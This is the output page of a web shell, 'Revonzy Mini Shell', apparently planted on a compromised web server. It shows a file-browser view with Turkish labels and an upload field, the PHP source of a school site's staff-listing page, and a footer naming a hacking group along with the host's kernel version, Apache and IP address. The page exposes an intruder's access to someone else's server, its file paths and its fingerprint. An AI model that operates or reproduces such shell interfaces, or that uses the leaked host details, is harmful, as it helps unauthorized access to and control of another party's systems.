Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/newsatarabca.com/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/newsatarabca.com/education-department.php

<?php
require_once("admin/lib/functions.php");
	$db = new login_function();
	
?>

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <!-- Title -->
    <title></title>

    <!-- Favicon -->
    <link rel="icon" href="img/core-img/favicon.ico">

    <!-- Core Stylesheet -->
    <link rel="stylesheet" href="style.css">
	<style>
body {
  
}

@media only screen and (max-width: 600px) {
  .img {
   width:20px;
   height:20px;
  }
}
.zoomin img 
{ 

 height: 300px; width: 800px;
 -webkit-transition: all 2s ease; -moz-transition: all 2s ease;
 -ms-transition: all 2s ease; 
 transition: all 2s ease;
 }
.zoomin img:hover {
 width:900px;
 height: 500px;
 }
 .sp_img
{
	height:150px;
	width:155px;
	padding:5px;
	border:0px solid #AFAFAF;
	margin-bottom:5px;
	border:1px solid #DFDFDF;
}
.sp_link_title
{
	background:none; border:0px; color:GREEN; text-decoration:none; float:right;
	font-family:Cambria;
	font-size:17px;
}
table  thead,tr,th,td
{
	border:1px solid;
	padding:10px;
}

</style>
</head>

<body>
    <!-- ##### Preloader ##### -->
    <div id="preloader">
        <i class="circle-preloader"></i>
    </div>

    <!-- ##### Header Area Start ##### -->
   <?php
	include('header.php');
   ?>
    <!-- ##### Header Area End ##### -->

    <div class="breadcumb-area bg-img" style="background-image: url(img/bg-img/breadcumb.jpg);">
        <div class="bradcumbContent">
            <h2>Education Department</h2>
        </div>
    </div>
    <!-- ##### Breadcumb Area End ##### -->

    <!-- ##### About Us Area Start ##### -->
   <section class="about-us-area mt-50 section-padding-100" style="min-height:300px;">
        <div class="container">
                       <div class="main_container" style="margin:auto; width:750px;">
			<div class="col_1_of_12 span_1_of_12">
			<span style="color:#E91546; font-weight:bold; font-size:22px; text-transform:uppercase; text-decoration:underline;">staff profile:</span>
			</div>
				<table  cellpadding="0" cellspacing="0" style="width:770px;border:1px solid black;">
				<thead style="background:#880015; color:white; text-align:center;">
					<tr rowspan="2" style="height:10px;">
						<th align="center" valign="middle">Sr. <br />No</th>
						<th align="center"  valign="middle" >Photo</th>
						<th  valign="middle" >Name</th>
						<th align="center" valign="middle">Designation</th> 
						<th align="center" valign="middle" >Department</th>
						<th align="center" valign="middle" >Qualification</th>
						<th align="center" valign="middle">Appoinment Date</th>
					<!--	<th align="center" valign="middle" style="background-color:#E91546;color:white;font-size:15px;border:1px solid black;text-align:center;margin:auto;vertical-align:middle;padding:0px;">PDF</th>-->

					</tr>
					</thead>
						<?php
						$dept = "Education";
						$report_details = $db->get_all_staff_data_by_department($dept);
						if(!empty($report_details))
						{
							$counter =0;
							foreach($report_details as $record)
							{
								$id				=	$report_details[$counter][0];
								$image			=	$report_details[$counter][1];
								$first_name		=	$report_details[$counter][2];
								$last_name		=	$report_details[$counter][3];
								$designation	=	$report_details[$counter][4];
								$department		=	$report_details[$counter][5];
								$qualification	=	$report_details[$counter][6];
								$appionement_date=	$report_details[$counter][7];
								

					?>
						<tr>
							<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;" ><?php echo $counter+1; ?></td>
							<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><a href="http://accmadha.com/profile-picture/<?php echo $image ?>" target="_blank"><img src="http://accmadha.com/profile-picture/<?php echo $image; ?>" height="70px" width="70px"></a></td>
							<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;text-align:left;"><?php echo $first_name.$last_name; ?></td>
							<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $designation; ?></td>
							<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $department; ?></td>
							<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $qualification; ?></td>
							<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;padding:0px;"><?php echo $appionement_date; ?></td>
							<!--<td align="center" valign="middle" style="font-size:15px;border:1px solid black;vertical-align:middle;;padding:0px;"><a href="/gallery/<?php echo $pdf; ?>" target="_blank">View <br />Profile</a></td>-->
							
						</tr>
					   <?php
						$counter ++;
							}
						}
						else
						{
						?>
						<td colspan="7">No Data Found...</td>
						<?php
						}
					   
					   
					   ?>
		
				</table>
	<br /><br />
			<div class="col_1_of_12 span_1_of_12">
			<span style="color:#E91546; font-weight:bold; font-size:22px; text-transform:uppercase; text-decoration:underline;">Downloads:</span>
			</div>
	<table cellspacing='0' style="margin:0px;width:100%; border:1px solid;" > <!-- cellspacing='0' is important, must stay -->

	<!-- Table Header -->
	<thead>
		<tr style="background:#880015; color:white; text-align:center;">
			<th width="40" class="tab_data">Sr.No</th>
			<th class="tab_data">Title</th>
			<th width="30" class="tab_data">View</th>
		</tr>
	</thead>
	<!-- Table Header -->

	<!-- Table Body -->
	<tbody>
			<?php
				$dept = "Education";
			
				$report_details = $db->get_all_downloads_images_departmentwise($dept);
				if(!empty($report_details))
				{
					$counter =0;
					foreach($report_details as $record)
					{
						$id				=	$report_details[$counter][0];
						$deparment		=	$report_details[$counter][1];
						
						$title			=	$report_details[$counter][2];
						$image			=	$report_details[$counter][3];
			?>
			<tr>
				<td><?php echo $counter+1; ?></td>										
				<td><?php echo $title; ?></td>
				<td><a href="http://accmadha.com/downloads/<?php echo $image; ?>" target="_blank">View</a></td>
			</tr>							
					<?php
					$counter++;
					}
					
				}
				else
				{
			?>				
				<tr>
					<td colspan="4">No data to list</td>
				</tr>
			<?php
				}				
			?>		
	</tbody>
	<!-- Table Body -->
</table>

			
			
			</div>   
        </div>
    </section>
    <!-- ##### About Us Area End ##### -->

    <!-- ##### Team Area Start ##### -->
  
    <!-- ##### Footer Area Start ##### -->
    <?php
		include('footer.php');
	?>
    <!-- ##### Footer Area Start ##### -->

    <!-- ##### All Javascript Script ##### -->
    <!-- jQuery-2.2.4 js -->
    <script src="js/jquery/jquery-2.2.4.min.js"></script>
    <!-- Popper js -->
    <script src="js/bootstrap/popper.min.js"></script>
    <!-- Bootstrap js -->
    <script src="js/bootstrap/bootstrap.min.js"></script>
    <!-- All Plugins js -->
    <script src="js/plugins/plugins.js"></script>
    <!-- Active js -->
    <script src="js/active.js"></script>
</body>

</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4